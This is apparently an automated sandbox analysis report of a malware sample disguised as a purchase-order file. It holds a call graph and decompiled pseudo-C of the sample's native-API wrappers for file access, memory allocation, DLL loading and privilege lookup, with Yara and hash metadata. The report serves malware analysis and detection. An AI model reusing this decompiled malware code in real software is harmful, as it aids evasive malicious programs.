15784->15781 15785 4076c0 7 API calls 15784->15785 15786 407a33 15785->15786 15786->15781 15787 418650 LdrLoadDll 15786->15787 15788 407a68 15787->15788 15788->15781 15789 418c50 LdrLoadDll 15788->15789 15789->15781 15880 4184a0 15790->15880 15792 40d7e5 15792->15722 15796 40d7f1 15796->15722 15797 418be0 2 API calls 15797->15792 15799 419700 LdrLoadDll 15798->15799 15800 407c1d 15799->15800 15800->15733 15802 419700 LdrLoadDll 15801->15802 15803 407c62 15802->15803 15804 4185a0 15803->15804 15805 419700 LdrLoadDll 15804->15805 15806 407c7c 15805->15806 15806->15739 15808 4076e9 15807->15808 15886 407630 15808->15886 15811 418c50 LdrLoadDll 15812 4076fc 15811->15812 15812->15811 15813 407787 15812->15813 15815 407782 15812->15815 15894 40d800 15812->15894 15813->15744 15814 418be0 2 API calls 15816 4077ba 15814->15816 15815->15814 15816->15813 15817 418460 LdrLoadDll 15816->15817 15818 40781f 15817->15818 15818->15813 15819 4184a0 LdrLoadDll 15818->15819 15820 407883 15819->15820 15820->15813 15821 413ed0 6 API calls 15820->15821 15822 4078d8 15821->15822 15822->15744 15824 41a850 2 API calls 15823->15824 15825 417fe7 15824->15825 15851 4085a0 15825->15851 15827 418002 15828 418040 15827->15828 15829 418029 15827->15829 15831 41a600 2 API calls 15828->15831 15830 41a680 2 API calls 15829->15830 15832 418036 15830->15832 15833 41807a 15831->15833 15832->15782 15834 41a600 2 API calls 15833->15834 15835 418093 15834->15835 15841 418334 15835->15841 15857 41a640 15835->15857 15838 418320 15839 41a680 2 API calls 15838->15839 15840 41832a 15839->15840 15840->15782 15842 41a680 2 API calls 15841->15842 15843 418389 15842->15843 15843->15782 15845 4075bf 15844->15845 15846 4074d5 15844->15846 15845->15784 15846->15845 15847 413ed0 6 API calls 15846->15847 15848 407542 15847->15848 15849 41a680 2 API calls 15848->15849 15850 407569 15848->15850 15849->15850 15850->15784 15852 4085c5 15851->15852 15853 409f70 LdrLoadDll 15852->15853 15854 4085f8 15853->15854 15855 40861d 15854->15855 15860 40b770 15854->15860 15855->15827 15877 418cd0 15857->15877 15861 40b79c 15860->15861 15862 418930 LdrLoadDll 15861->15862 15863 40b7b5 15862->15863 15864 40b7bc 15863->15864 15871 418970 15863->15871 15864->15855 15868 40b7f7 15869 418be0 2 API calls 15868->15869 15870 40b81a 15869->15870 15870->15855 15872 419700 LdrLoadDll 15871->15872 15873 40b7df 15872->15873 15873->15864 15874 418f60 15873->15874 15875 418f7f 15874->15875 15876 419700 LdrLoadDll 15874->15876 15875->15868 15876->15875 15878 419700 LdrLoadDll 15877->15878 15879 418319 15878->15879 15879->15838 15879->15841 15881 419700 LdrLoadDll 15880->15881 15882 40d7c4 15881->15882 15882->15792 15883 418540 15882->15883 15884 419700 LdrLoadDll 15883->15884 15885 40d7d5 15884->15885 15885->15796 15885->15797 15887 407648 15886->15887 15888 409f70 LdrLoadDll 15887->15888 15889 407663 15888->15889 15890 4142d0 LdrLoadDll 15889->15890 15891 407673 15890->15891 15892 40767c PostThreadMessageW 15891->15892 15893 407690 15891->15893 15892->15893 15893->15812 15895 40d813 15894->15895 15896 40d83e 15895->15896 15898 4185e0 15895->15898 15896->15812 15899 4185fc 15898->15899 15900 419700 LdrLoadDll 15898->15900 15899->15896 15900->15899 15902 40d6f1 15901->15902 15910 418e30 15902->15910 15905 40d738 15905->15710 15906 418650 LdrLoadDll 15907 40d74f 15906->15907 15907->15905 15908 418c50 LdrLoadDll 15907->15908 15909 40d76e 15908->15909 15909->15710 15911 419700 LdrLoadDll 15910->15911 15912 40d731 15911->15912 15912->15905 15912->15906

                                                                                            Executed Functions

                                                                                            Function 00418A6B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60filenativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 108 418a6b-418a6f 109 418a71-418aa9 call 419700 108->109 110 418ac6-418b01 call 419700 NtCreateFile 108->110
                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00408F43,?,7@A,00408F43,FFFFFFFF,?,?,FFFFFFFF,00408F43,00414037,?,00408F43,00000060,00000000,00000000), ref: 00418AFD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID: 7@A
                                                                                            • API String ID: 823142352-801575940
                                                                                            • Opcode ID: 727cddaded19434ab991283a0ee689947c9faa0335fc795ee00e6bec7a012498
                                                                                            • Instruction ID: 4b51124e3bd61a4573ec68487a2c8b36153702ea6e10e8ed1eb9459a9a787ba8
                                                                                            • Opcode Fuzzy Hash: 727cddaded19434ab991283a0ee689947c9faa0335fc795ee00e6bec7a012498
                                                                                            • Instruction Fuzzy Hash: 6F11D0B2214108AFCB08DF98DC95EEB77AEAF8C754F148249FA1D97241D634EC51CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418AB0 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40filenativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 124 418ab0-418b01 call 419700 NtCreateFile
                                                                                            C-Code - Quality: 100%
                                                                                            			E00418AB0(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, char _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;

				_t3 = _a4 + 0xc48; // 0xc48
				E00419700( *((intOrPtr*)(_a4 + 0x14)), _t15, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x28);
				_t11 =  &_a20; // 0x414037
				_t21 = NtCreateFile(_a8, _a12, _a16,  *_t11, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}




                                                                                            0x00418abf
                                                                                            0x00418ac7
                                                                                            0x00418ae9
                                                                                            0x00418afd
                                                                                            0x00418b01

                                                                                            APIs
                                                                                            • NtCreateFile.NTDLL(00000060,00408F43,?,7@A,00408F43,FFFFFFFF,?,?,FFFFFFFF,00408F43,00414037,?,00408F43,00000060,00000000,00000000), ref: 00418AFD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: CreateFile
                                                                                            • String ID: 7@A
                                                                                            • API String ID: 823142352-801575940
                                                                                            • Opcode ID: 0b4a7f69a494bee332e540e635ee0ed8593f4757e071c339ca62754d47a116a7
                                                                                            • Instruction ID: c30b5ff41096a2f60b4068db598543ba47d231afbfc6f97fb99956b13c0b0e1d
                                                                                            • Opcode Fuzzy Hash: 0b4a7f69a494bee332e540e635ee0ed8593f4757e071c339ca62754d47a116a7
                                                                                            • Instruction Fuzzy Hash: D3F0B2B2210108ABCB48CF89DC95EDB37ADAF8C754F018208FA0D97241C630E851CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00409F70 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 258 409f70-409f99 call 41b550 261 409f9b-409f9e 258->261 262 409f9f-409fad call 41b970 258->262 265 409fbd-409fce call 419ca0 262->265 266 409faf-409fba call 41bbf0 262->266 271 409fd0-409fe4 LdrLoadDll 265->271 272 409fe7-409fea 265->272 266->265 271->272
                                                                                            C-Code - Quality: 100%
                                                                                            			E00409F70(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041B550( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B970(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041BBF0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419CA0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                                            0x00409f8c
                                                                                            0x00409f8f
                                                                                            0x00409f94
                                                                                            0x00409f99
                                                                                            0x00409fa3
                                                                                            0x00409fa8
                                                                                            0x00409fab
                                                                                            0x00409fad
                                                                                            0x00409fb5
                                                                                            0x00409fba
                                                                                            0x00409fba
                                                                                            0x00409fc1
                                                                                            0x00409fc9
                                                                                            0x00409fcc
                                                                                            0x00409fce
                                                                                            0x00409fe2
                                                                                            0x00000000
                                                                                            0x00409fe4
                                                                                            0x00409fea
                                                                                            0x00409f9e
                                                                                            0x00409f9e
                                                                                            0x00409f9e

                                                                                            APIs
                                                                                            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409FE2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Load
                                                                                            • String ID:
                                                                                            • API String ID: 2234796835-0
                                                                                            • Opcode ID: e50510530ad2ae1b1d579bca8e1c56ac484d5ebe242c57014b58d11bb330066c
                                                                                            • Instruction ID: fc6c4bb0cb3bb0ea2982c011419b504ef06d4261b74d5fd86f1638fcb4569986
                                                                                            • Opcode Fuzzy Hash: e50510530ad2ae1b1d579bca8e1c56ac484d5ebe242c57014b58d11bb330066c
                                                                                            • Instruction Fuzzy Hash: EB0100B5D0010EABDB10DAA5DC42FDEB7B89B54308F0041A9E908A7281F635EA54CB95
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418B5A Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 273 418b5a-418ba9 call 419700 NtReadFile
                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(004141F2,5D0515AF,FFFFFFFF,00413EB1,?,?,004141F2,?,00413EB1,FFFFFFFF,5D0515AF,004141F2,?,00000000), ref: 00418BA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: fe87173da90e7ab8d86c4323b5fcac6f05fbaf98fb2144bf0ef1e897bdb8a2ca
                                                                                            • Instruction ID: 993ff9f11532132106c27203f05301c56ca38957beaa58fa7686b0e21a25551e
                                                                                            • Opcode Fuzzy Hash: fe87173da90e7ab8d86c4323b5fcac6f05fbaf98fb2144bf0ef1e897bdb8a2ca
                                                                                            • Instruction Fuzzy Hash: FBF0ECB6200108AFCB14DF99DC81DEB77A9EF8C354F158259F95DD7251D630E851CBA0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418B60 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 276 418b60-418b76 277 418b7c-418ba9 NtReadFile 276->277 278 418b77 call 419700 276->278 278->277
                                                                                            C-Code - Quality: 37%
                                                                                            			E00418B60(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				intOrPtr* _t27;

				_t13 = _a4;
				_t27 = _a4 + 0xc50;
				E00419700( *((intOrPtr*)(_t13 + 0x14)), _t13, _t27,  *((intOrPtr*)(_t13 + 0x14)), 0, 0x2a);
				_t18 =  *((intOrPtr*)( *_t27))(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40); // executed
				return _t18;
			}





                                                                                            0x00418b63
                                                                                            0x00418b6f
                                                                                            0x00418b77
                                                                                            0x00418ba5
                                                                                            0x00418ba9

                                                                                            APIs
                                                                                            • NtReadFile.NTDLL(004141F2,5D0515AF,FFFFFFFF,00413EB1,?,?,004141F2,?,00413EB1,FFFFFFFF,5D0515AF,004141F2,?,00000000), ref: 00418BA5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: FileRead
                                                                                            • String ID:
                                                                                            • API String ID: 2738559852-0
                                                                                            • Opcode ID: d8a8e0eec9e23ace7ac2f4b4d174b46badc71d3dbf94d18e931e12570c500ada
                                                                                            • Instruction ID: b887ff3c00cba29ec2ae6da3904e2e26f8d9dc9ae1873c2c109b64804be14f43
                                                                                            • Opcode Fuzzy Hash: d8a8e0eec9e23ace7ac2f4b4d174b46badc71d3dbf94d18e931e12570c500ada
                                                                                            • Instruction Fuzzy Hash: 09F0AFB6210208ABCB14DF89DC85EEB77ADAF8C754F158249FA1DA7241D630E851CBA4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418C8A Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 279 418c8a-418ccd call 419700 NtAllocateVirtualMemory
                                                                                            C-Code - Quality: 79%
                                                                                            			E00418C8A(void* __eax, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t16;

				asm("cld");
				_t12 = _a4;
				_t3 = _t12 + 0xc68; // 0x3c68
				E00419700( *((intOrPtr*)(_a4 + 0x14)), _t12, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t16 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t16;
			}




                                                                                            0x00418c8b
                                                                                            0x00418c93
                                                                                            0x00418c9f
                                                                                            0x00418ca7
                                                                                            0x00418cc9
                                                                                            0x00418ccd

                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041993D,?,0041993D,?,00000000,?,00003000,00000040,00408F43,00000000), ref: 00418CC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: e1b80980550af702d06e2c0ee222753ab5caab41e6472034651e688422b5d5d8
                                                                                            • Instruction ID: e159302c8a4dfde50d61e01274343a535531dfb1bd2f334ad6a483b4737c54b3
                                                                                            • Opcode Fuzzy Hash: e1b80980550af702d06e2c0ee222753ab5caab41e6472034651e688422b5d5d8
                                                                                            • Instruction Fuzzy Hash: 10F085B6210208ABCB14DF88DC80EEB77ADAF88350F018208FE0897341C630ED10CBE0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418C90 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 282 418c90-418ca6 283 418cac-418ccd NtAllocateVirtualMemory 282->283 284 418ca7 call 419700 282->284 284->283
                                                                                            C-Code - Quality: 100%
                                                                                            			E00418C90(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;

				_t3 = _a4 + 0xc68; // 0x3c68
				E00419700( *((intOrPtr*)(_a4 + 0x14)), _t10, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}




                                                                                            0x00418c9f
                                                                                            0x00418ca7
                                                                                            0x00418cc9
                                                                                            0x00418ccd

                                                                                            APIs
                                                                                            • NtAllocateVirtualMemory.NTDLL(?,00000000,?,0041993D,?,0041993D,?,00000000,?,00003000,00000040,00408F43,00000000), ref: 00418CC9
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: AllocateMemoryVirtual
                                                                                            • String ID:
                                                                                            • API String ID: 2167126740-0
                                                                                            • Opcode ID: ab7b8ac6be900b1ce8f5504a61879f069c4a5f7f9a094fdb9308e93792aaba3f
                                                                                            • Instruction ID: 2266af49140b9cb7a2711c2afab94170beca4244258c459a17078da74b3b0697
                                                                                            • Opcode Fuzzy Hash: ab7b8ac6be900b1ce8f5504a61879f069c4a5f7f9a094fdb9308e93792aaba3f
                                                                                            • Instruction Fuzzy Hash: 6AF015B6210208ABCB14DF89DC81EEB77ADAF88754F018209FE0897241C630F810CBB4
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418BDA Relevance: 1.5, APIs: 1, Instructions: 21nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 82%
                                                                                            			E00418BDA(void* __edx, intOrPtr _a4, void* _a8) {
				void* _v117;
				long _t9;

				asm("repne xor dh, [ecx+ebx*2-0x66]");
				_t6 = _a4;
				_t3 = _t6 + 0x14; // 0x56c29f0f
				_t4 = _t6 + 0xc58; // 0x409b9b
				E00419700( *_t3, _a4, _t4,  *_t3, 0, 0x2c);
				_t9 = NtClose(_a8); // executed
				return _t9;
			}





                                                                                            0x00418bda
                                                                                            0x00418be3
                                                                                            0x00418be6
                                                                                            0x00418bef
                                                                                            0x00418bf7
                                                                                            0x00418c05
                                                                                            0x00418c09

                                                                                            APIs
                                                                                            • NtClose.NTDLL(004141D0,?,?,004141D0,00408F43,FFFFFFFF), ref: 00418C05
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: ec0a4ebd0f371e89123fc22c37460b8250d9d7c0f0abe7a408fa17f1e76ec42a
                                                                                            • Instruction ID: 16ed77bf063286cab575f0d1f476c4cded52c9863c0e2e177692ed5bb1409710
                                                                                            • Opcode Fuzzy Hash: ec0a4ebd0f371e89123fc22c37460b8250d9d7c0f0abe7a408fa17f1e76ec42a
                                                                                            • Instruction Fuzzy Hash: 05E08C75600144BBD721DFB89C86EDB3F6ADF85260F144099F948AB262C532EA41C7A0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418BE0 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 100%
                                                                                            			E00418BE0(intOrPtr _a4, void* _a8) {
				long _t8;

				_t5 = _a4;
				_t2 = _t5 + 0x14; // 0x56c29f0f
				_t3 = _t5 + 0xc58; // 0x409b9b
				E00419700( *_t2, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}




                                                                                            0x00418be3
                                                                                            0x00418be6
                                                                                            0x00418bef
                                                                                            0x00418bf7
                                                                                            0x00418c05
                                                                                            0x00418c09

                                                                                            APIs
                                                                                            • NtClose.NTDLL(004141D0,?,?,004141D0,00408F43,FFFFFFFF), ref: 00418C05
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: Close
                                                                                            • String ID:
                                                                                            • API String ID: 3535843008-0
                                                                                            • Opcode ID: 126a5657bfa458edb9a3911ca33ea7b7fbc5fc36c9e97d7aa6f669463e901713
                                                                                            • Instruction ID: eb8d0a7e73eb43beade44ddd3ae991b8ba5f944d69645f0ee69a28326501a28a
                                                                                            • Opcode Fuzzy Hash: 126a5657bfa458edb9a3911ca33ea7b7fbc5fc36c9e97d7aa6f669463e901713
                                                                                            • Instruction Fuzzy Hash: FDD01776210214BBD610EFD9DC89ED77BADDF48660F014055FA186B282C930FA40C6E0
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00408D10 Relevance: .1, Instructions: 92COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 93%
                                                                                            			E00408D10(signed int _a4) {
				intOrPtr _v8;
				char _v24;
				char _v284;
				char _v804;
				char _v840;
				void* _t24;
				void* _t31;
				void* _t33;
				void* _t34;
				signed int* _t39;
				char* _t43;
				void* _t49;
				signed int _t51;
				void* _t54;
				void* _t55;
				void* _t56;
				void* _t57;

				_t51 = _a4;
				_t39 = 0; // executed
				_t24 = E004071C0(_t51,  &_v24); // executed
				_t55 = _t54 + 8;
				if(_t24 != 0) {
					E004073D0( &_v24,  &_v840);
					_t56 = _t55 + 8;
					do {
						E0041A6D0( &_v284, 0x104);
						E0041AD40( &_v284,  &_v804);
						_t57 = _t56 + 0x10;
						_t49 = 0x4f;
						while(1) {
							_t31 = E00414270(E00414210(_t51, _t49),  &_v284);
							_t57 = _t57 + 0x10;
							if(_t31 != 0) {
								break;
							}
							_t49 = _t49 + 1;
							if(_t49 <= 0x62) {
								continue;
							} else {
							}
							goto L8;
						}
						_t9 = _t51 + 0x18; // 0x5e14c483
						 *(_t51 + 0x478) =  *(_t51 + 0x478) ^  *_t9;
						_t39 = 1;
						L8:
						_t33 = E00407400( &_v24,  &_v840);
						_t56 = _t57 + 8;
					} while (_t33 != 0 && _t39 == 0);
					_t43 =  &_v24;
					_t34 = E00407480(_t51, _t43); // executed
					if(_t39 == 0) {
						asm("rdtsc");
						 *_t39 =  *_t39 ^ _t51;
						asm("rdtsc");
						_v8 = _t34 - _t43 + _t34;
						 *((intOrPtr*)(_t51 + 0x560)) =  *((intOrPtr*)(_t51 + 0x560)) + 0xffffffba;
					}
					 *((intOrPtr*)(_t51 + 0x35)) =  *((intOrPtr*)(_t51 + 0x35)) + _t39;
					_t20 = _t51 + 0x35; // 0xffff43e8
					 *((intOrPtr*)(_t51 + 0x36)) =  *((intOrPtr*)(_t51 + 0x36)) +  *_t20 + 1;
					return 1;
				} else {
					return _t24;
				}
			}




















                                                                                            0x00408d1b
                                                                                            0x00408d23
                                                                                            0x00408d25
                                                                                            0x00408d2a
                                                                                            0x00408d2f
                                                                                            0x00408d42
                                                                                            0x00408d47
                                                                                            0x00408d50
                                                                                            0x00408d5c
                                                                                            0x00408d6f
                                                                                            0x00408d74
                                                                                            0x00408d77
                                                                                            0x00408d80
                                                                                            0x00408d92
                                                                                            0x00408d97
                                                                                            0x00408d9c
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00408d9e
                                                                                            0x00408da2
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00408da4
                                                                                            0x00000000
                                                                                            0x00408da2
                                                                                            0x00408da6
                                                                                            0x00408da9
                                                                                            0x00408daf
                                                                                            0x00408db1
                                                                                            0x00408dbc
                                                                                            0x00408dc1
                                                                                            0x00408dc4
                                                                                            0x00408dcc
                                                                                            0x00408dd1
                                                                                            0x00408ddc
                                                                                            0x00408dde
                                                                                            0x00408ddf
                                                                                            0x00408de4
                                                                                            0x00408de8
                                                                                            0x00408deb
                                                                                            0x00408deb
                                                                                            0x00408df2
                                                                                            0x00408df5
                                                                                            0x00408dfa
                                                                                            0x00408e07
                                                                                            0x00408d36
                                                                                            0x00408d36
                                                                                            0x00408d36

                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3f3df2afbf45e6a43c218db93a3b40b511cd449a3fc1eb436c3592c33f752c29
                                                                                            • Instruction ID: af3d230e5c2ca14dce7ffbd4d7df7c3bdf8625ecd8843d16e1e6e862e82d41e5
                                                                                            • Opcode Fuzzy Hash: 3f3df2afbf45e6a43c218db93a3b40b511cd449a3fc1eb436c3592c33f752c29
                                                                                            • Instruction Fuzzy Hash: 43210CB2D4010957CB14D660AD41AEB73AC9F64304F44057FF989A31C1F63CBB4987A6
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00418EC5 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 60COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 116 418ec5-418ecc 117 418f11-418f3a call 419700 116->117 118 418ece-418f10 call 419700 116->118 122 418f3f-418f54 LookupPrivilegeValueW 117->122
                                                                                            C-Code - Quality: 29%
                                                                                            			E00418EC5(signed int __eax, void* __ecx, void* __esi, intOrPtr _a3, intOrPtr _a7, WCHAR* _a11, WCHAR* _a15, struct _LUID* _a19, intOrPtr _a23, char _a27) {
				char _v1;
				int _t24;
				intOrPtr* _t46;

				if((__eax & 0xd60339cb) != 0) {
					_pop(ds);
					asm("rol byte [ecx], cl");
					asm("ficomp word [eax+0xc]");
					_push( &_v1);
					_t21 = _a7;
					_push(__esi);
					E00419700( *((intOrPtr*)(_a7 + 0xa1c)), _a7, _t21 + 0xc94,  *((intOrPtr*)(_a7 + 0xa1c)), 0, 0x46);
					_t24 = LookupPrivilegeValueW(_a11, _a15, _a19); // executed
					return _t24;
				} else {
					_t25 = _a3;
					_t4 = _t25 + 0xc90; // 0xd94
					_t46 = _t4;
					E00419700( *((intOrPtr*)(_a3 + 0xa18)), _a3, _t46,  *((intOrPtr*)(_a3 + 0xa18)), 0, 0x39);
					_t5 =  &_a27; // 0x40ed6e
					return  *((intOrPtr*)( *_t46))(_a7, _a11, _a15, _a19, _a23,  *_t5, __esi,  &_v1);
				}
			}






                                                                                            0x00418ecc
                                                                                            0x00418f11
                                                                                            0x00418f17
                                                                                            0x00418f1a
                                                                                            0x00418f20
                                                                                            0x00418f23
                                                                                            0x00418f2c
                                                                                            0x00418f3a
                                                                                            0x00418f50
                                                                                            0x00418f54
                                                                                            0x00418ece
                                                                                            0x00418ed3
                                                                                            0x00418ee2
                                                                                            0x00418ee2
                                                                                            0x00418eea
                                                                                            0x00418eef
                                                                                            0x00418f10
                                                                                            0x00418f10

                                                                                            APIs
                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040D3F2,0040D3F2,00000041,00000000,?,00408FB5), ref: 00418F50
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000004.00000002.544490166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_4_2_400000_PO-INQUIRY-VALE-SP-2022-60.jbxd
                                                                                            Yara matches
                                                                                            Similarity
                                                                                            • API ID: LookupPrivilegeValue
                                                                                            • String ID: n@P
                                                                                            • API String ID: 3899507212-977122041
